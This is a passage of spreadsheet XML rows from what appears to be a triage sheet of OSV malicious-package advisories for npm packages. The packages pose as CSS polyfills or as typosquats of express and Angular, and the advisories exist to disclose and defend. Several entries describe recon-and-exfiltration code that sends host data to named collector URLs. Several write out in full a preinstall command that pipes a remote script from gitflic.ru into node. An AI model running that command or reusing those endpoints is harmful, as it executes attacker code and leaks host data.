      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17482</t>
        </is>
      </c>
      <c r="D139" s="5" t="inlineStr"/>
      <c r="E139" s="5" t="inlineStr"/>
      <c r="F139" s="5" t="inlineStr"/>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr">
        <is>
          <t>npm:css-logical-prop-shim</t>
        </is>
      </c>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr"/>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d0ffba65f80ee8f200199c8c90ebb6297b8590537c80ea50bb34874d91665b5f)
The package ships thunderboltRegistry.js which imports child_process and invokes execSync with curl commands at multiple sites (lines 30, 39, 47, 48). The declared purpose of the package is a CSS logical-property shim, which has no legitimate need to spawn shells or make outbound curl requests. The co-location of child_process + repeated execSync('curl...') calls in a package whose stated purpose is a frontend CSS polyfill is the shape of a dropper or exfiltration helper rather than library code, and the file name 'thunderboltRegistry' is unrelated to any CSS functionality.
</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17482</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17483</t>
        </is>
      </c>
      <c r="D140" s="5" t="inlineStr"/>
      <c r="E140" s="5" t="inlineStr"/>
      <c r="F140" s="5" t="inlineStr"/>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr">
        <is>
          <t>npm:css-reading-flow-polyfill</t>
        </is>
      </c>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr"/>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3b18e313d5fc67f07c1bcf051bd79a85dca97bb3c4510d9755efca6414bb55ff)
The package is published as css-reading-flow-polyfill but ships thunderboltRegistry.js, which impersonates internal Wix thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) by exporting all of those names from a single payload file. On require, an IIFE in thunderboltRegistry.js uses child_process.execSync to run id, whoami, uname, ifconfig/ip-addr and read /etc/hosts, then fetches http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP with the command output, hostname, Node version, platform and pid appended as query parameters. The module also walks require.cache and deletes any entry whose key contains 'thunderboltRegistry' so the recon-and-exfil IIFE re-runs on every require rather than being cached. index.js is an empty decoy; the stated CSS polyfill purpose is a cover story and the package has no implementation of that functionality.
</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17483</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17484</t>
        </is>
      </c>
      <c r="D141" s="5" t="inlineStr"/>
      <c r="E141" s="5" t="inlineStr"/>
      <c r="F141" s="5" t="inlineStr"/>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr">
        <is>
          <t>npm:css-relative-color-util</t>
        </is>
      </c>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr"/>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee0efef48c7d56201a037b237f11ec712853f86e74f6a00ef8011732b31363f1)
The package name advertises a CSS utility, but thunderboltRegistry.js runs an IIFE on module load that uses child_process.execSync to execute whoami, uname -a, cat /etc/hosts, and ifconfig/ip addr, then exfiltrates the output together with os.hostname and the Node version to a hardcoded webhook at https://dxpoc.gt.tc/callback.php/ via fetch and to an *.oast.live DNS collector via dns.resolve. The loader deletes any require.cache entry containing 'thunderboltRegistry' so the IIFE re-fires on subsequent requires, and falls back to node:child_process and new module.constructor().require('child_process') to obtain the exec primitive. The package also exports stubs named thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry and similar, matching internal Wix thunderbolt module names, with a registry-manifest.min.json pointing at static.parastorage.com unpkg paths — a dependency-confusion shape targeting an internal namespace. The declared CSS-utility purpose is unrelated to any of this behavior.
</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17484</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17485</t>
        </is>
      </c>
      <c r="D142" s="5" t="inlineStr"/>
      <c r="E142" s="5" t="inlineStr"/>
      <c r="F142" s="5" t="inlineStr"/>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>npm:css-scroll-anchor-polyfill</t>
        </is>
      </c>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr"/>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (36596ba9b9d8c0f994abe3cd87783f4f0dc880e63d55374d3555347ce349fab2)
Package is published as css-scroll-anchor-polyfill but its index.js is empty and its contents impersonate internal Wix thunderbolt registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) with a shipped registry-manifest.min.json mapping them to parastorage.com URLs. The declared purpose (a CSS scroll-anchor polyfill) is unrelated to the shipped code. thunderboltRegistry.js contains a top-level IIFE that executes on require: it runs local reconnaissance via child_process.execSync (cat /etc/hosts, whoami, id, pwd, ifconfig/ip addr, hostname, uname -a) and transmits the collected output together with a beacon (node version, process.platform, pid) via fetch to a hardcoded HTTP endpoint at http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. Any internal build that resolves one of the impersonated thunderbolt names to this public package and requires the corresponding submodule triggers the reconnaissance and exfiltration path.
</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17485</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17486</t>
        </is>
      </c>
      <c r="D143" s="5" t="inlineStr"/>
      <c r="E143" s="5" t="inlineStr"/>
      <c r="F143" s="5" t="inlineStr"/>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr">
        <is>
          <t>npm:css-scroll-state-polyfill</t>
        </is>
      </c>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr"/>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cffa0affc34bac3fa24fcc7c67aae4d120066f4f856cb8b637bc04c6ca9d482c)
The package presents itself as a CSS polyfill but ships a payload file (thunderboltRegistry.js) that executes an IIFE at require time. The IIFE uses child_process to run host-identification commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts, hostname) and collects Node version, platform, and PID, then sends the captured data via fetch to a hardcoded webhook.site collector at https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The main index.js is an empty stub; filenames mimic internal Wix Thunderbolt registry modules, consistent with a dependency-confusion squat targeting that namespace. A self-identifying 'beacon=poc15' tag is included in the request. The payload also walks require.cache and deletes any entry whose key contains 'thunderboltRegistry', causing subsequent requires in the same process to re-execute the recon-and-exfiltration path rather than return a cached export, and exports a Proxy that answers arbitrary method accesses to blend in with the impersonated registry.
</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17486</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17487</t>
        </is>
      </c>
      <c r="D144" s="5" t="inlineStr"/>
      <c r="E144" s="5" t="inlineStr"/>
      <c r="F144" s="5" t="inlineStr"/>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr">
        <is>
          <t>npm:css-snap-target-polyfill</t>
        </is>
      </c>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr"/>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (00c104d427125b4acf88ecb83a58d563507b23bcb716cb87fbf7fc953d816d42)
The package ships thunderboltRegistry.js, which uses child_process and process.platform to collect host information and POSTs it via fetch() to the hardcoded external endpoint http://dxpoc.gt.tc. The destination is unrelated to any CSS polyfill functionality the package name advertises, is served over cleartext HTTP, and is not caller-configurable. This behavior does not correspond to the declared purpose of a CSS snap-target polyfill, which has no legitimate need to execute shell commands or beacon host details to a third-party domain.
</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17487</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17488</t>
        </is>
      </c>
      <c r="D145" s="5" t="inlineStr"/>
      <c r="E145" s="5" t="inlineStr"/>
      <c r="F145" s="5" t="inlineStr"/>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr">
        <is>
          <t>npm:css-starting-style-polyfill</t>
        </is>
      </c>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr"/>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (713c302594ab7c41e8034ca95478045afafba98e223ea62def160f080cb879cd)
thunderboltRegistry.js runs an IIFE on module load that executes host reconnaissance commands via child_process.execSync (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and transmits the collected output together with hostname, platform, and pid to a hardcoded external URL https://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f via fetch. The package exports factories under names matching Wix internal registry modules (thunderboltRegistry, corvidRegistry, siteAssetsRegistry, editorRegistry, documentManagementRegistry) and ships a manifest referencing parastorage.com URLs, so any environment loading it as a drop-in Wix thunderbolt registry triggers the exfiltration payload on require(). The declared CSS @starting-style polyfill purpose has no relationship to the shipped behavior.
</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17488</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17489</t>
        </is>
      </c>
      <c r="D146" s="5" t="inlineStr"/>
      <c r="E146" s="5" t="inlineStr"/>
      <c r="F146" s="5" t="inlineStr"/>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr">
        <is>
          <t>npm:express-enhanced</t>
        </is>
      </c>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr"/>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (15d6ce3e4c988439e6023bb900fde41c1a7eebe0c372eddc3a3c3c9d8206a9d6)
express-enhanced@5.2.2 impersonates the express package: it ships the express README verbatim, declares `TJ Holowaychuk` as author, and points `repository` at `expressjs/express`, while publishing under a different name. The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading an unpinned JavaScript payload from a gitflic.ru account unrelated to the express maintainers (wrapped through web.archive.org) and piping it directly to node at `npm install` time. The fetched content is not integrity-checked, the source is mutable and attacker-controlled, and execution happens automatically on install, giving the publisher arbitrary code execution on any machine that installs the package.
</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17489</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17490</t>
        </is>
      </c>
      <c r="D147" s="5" t="inlineStr"/>
      <c r="E147" s="5" t="inlineStr"/>
      <c r="F147" s="5" t="inlineStr"/>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr">
        <is>
          <t>npm:express-fork</t>
        </is>
      </c>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr"/>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (174daf2d7b9b396bb40a2ad347597eb7d1e829c46e4568e9700302e8aaceee3d)
express-fork@5.2.2 is a typosquat of the express package. Its package.json metadata (description, author, repository, keywords) is copied verbatim from express, while package.json line 98 defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/...?file=node.js | node`. On every `npm install`, the hook fetches an unpinned JavaScript file from a third-party gitflic.ru account unrelated to the Express publisher (via a web.archive.org wrapper) and pipes it directly to the Node interpreter, with no integrity or signature check. The fetched content executes with the privileges of the installing user and can perform arbitrary actions on the installer's machine, including credential theft, persistence, or further payload delivery. The impersonation of express is the lure that causes typo-based installs to trigger the remote-exec hook.
</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17490</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17491</t>
        </is>
      </c>
      <c r="D148" s="5" t="inlineStr"/>
      <c r="E148" s="5" t="inlineStr"/>
      <c r="F148" s="5" t="inlineStr"/>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr">
        <is>
          <t>npm:focus-visible-polyfill-lite</t>
        </is>
      </c>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr"/>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5225b5a8636a589f9b90272ad04c3f4104670a23d5c24b45f6aeaa757a4f2a2b)
The package is advertised as a focus-visible polyfill but ships thunderboltRegistry.js, which impersonates Wix thunderbolt internal registry modules (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) via a Proxy-backed export stub. When the module is required, an IIFE at the top of the file uses child_process.execSync to run host reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and sends the command output along with a beacon (Node version, platform, pid) via plain-HTTP GET requests to a hardcoded attacker-controlled endpoint at http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package self-labels the beacon as 'rce-poc'. The shape is a dependency-confusion / typosquat payload: a benign-sounding public package shadows Wix-internal registry names so that a build pipeline resolving these names from the public registry executes the reconnaissance payload with the installer's privileges on module load.
</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17491</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17492</t>
        </is>
      </c>
      <c r="D149" s="5" t="inlineStr"/>
      <c r="E149" s="5" t="inlineStr"/>
      <c r="F149" s="5" t="inlineStr"/>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/cli</t>
        </is>
      </c>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr"/>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8)
Package is published as @angularr/cli (double 'r') and copies @angular/cli's description, keywords, homepage, repository URL, README, and version string (22.2.1) to impersonate Angular's official CLI. package.json declares a preinstall lifecycle hook that pipes a remote JavaScript file into node: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. The fetched script is hosted on gitflic.ru (user 'hellscripter', unrelated to Angular's publisher), proxied through web.archive.org, is unpinned, has no integrity check, and is executed directly by the installer's node process. Any `npm install @angularr/cli` performs arbitrary code execution on the installer's host under the account running npm. src/analytics/analytics-collector.js additionally issues outbound ping/POST traffic via https.request carrying host identifiers.
</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17492</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17493</t>
        </is>
      </c>
      <c r="D150" s="5" t="inlineStr"/>
      <c r="E150" s="5" t="inlineStr"/>
      <c r="F150" s="5" t="inlineStr"/>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/core</t>
        </is>
      </c>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr"/>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (801dcd769bdbf58aa11a657a5344e075ed57fcdafd1384b47ba611956e7cb365)
The package's npm preinstall lifecycle script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching a JavaScript payload from a third-party host and piping it directly to node for execution on every `npm install`. The destination (gitflic.ru under a user path `hellscripter/install-scripts`, routed via a web.archive.org proxy) is unrelated to any `@angular` publisher infrastructure, is unpinned, and is not integrity-checked. Whoever controls that path controls code execution on the installer's host. The package name `@angularr/core` is a one-letter variant of the widely-used `@angular/core`, increasing the likelihood of accidental installation.
</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17493</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17494</t>
        </is>
      </c>
      <c r="D151" s="5" t="inlineStr"/>
      <c r="E151" s="5" t="inlineStr"/>
      <c r="F151" s="5" t="inlineStr"/>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr">
        <is>
          <t>npm:@angularr/router</t>
        </is>
      </c>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr"/>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (646c9fd4e8d09651eb6d5ec997e6d1b62f294d39d52ec3b4143853c922f15e83)
The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from a third-party repository (gitflic.ru user `hellscripter`, proxied via web.archive.org) and piping it directly into Node for execution during `npm install`. The code executes with the installer's privileges before any package code is loaded. The package name `@angularr/router` (double-r) resembles `@angular/router`, while the shipped library code is a verbatim copy of pillarjs/router (unrelated to Angular) that serves as cover for the malicious lifecycle hook.
</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17494</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17495</t>
        </is>
      </c>
      <c r="D152" s="5" t="inlineStr"/>
      <c r="E152" s="5" t="inlineStr"/>
      <c r="F152" s="5" t="inlineStr"/>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr">
        <is>
          <t>npm:@angulra/cli</t>
        </is>
      </c>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
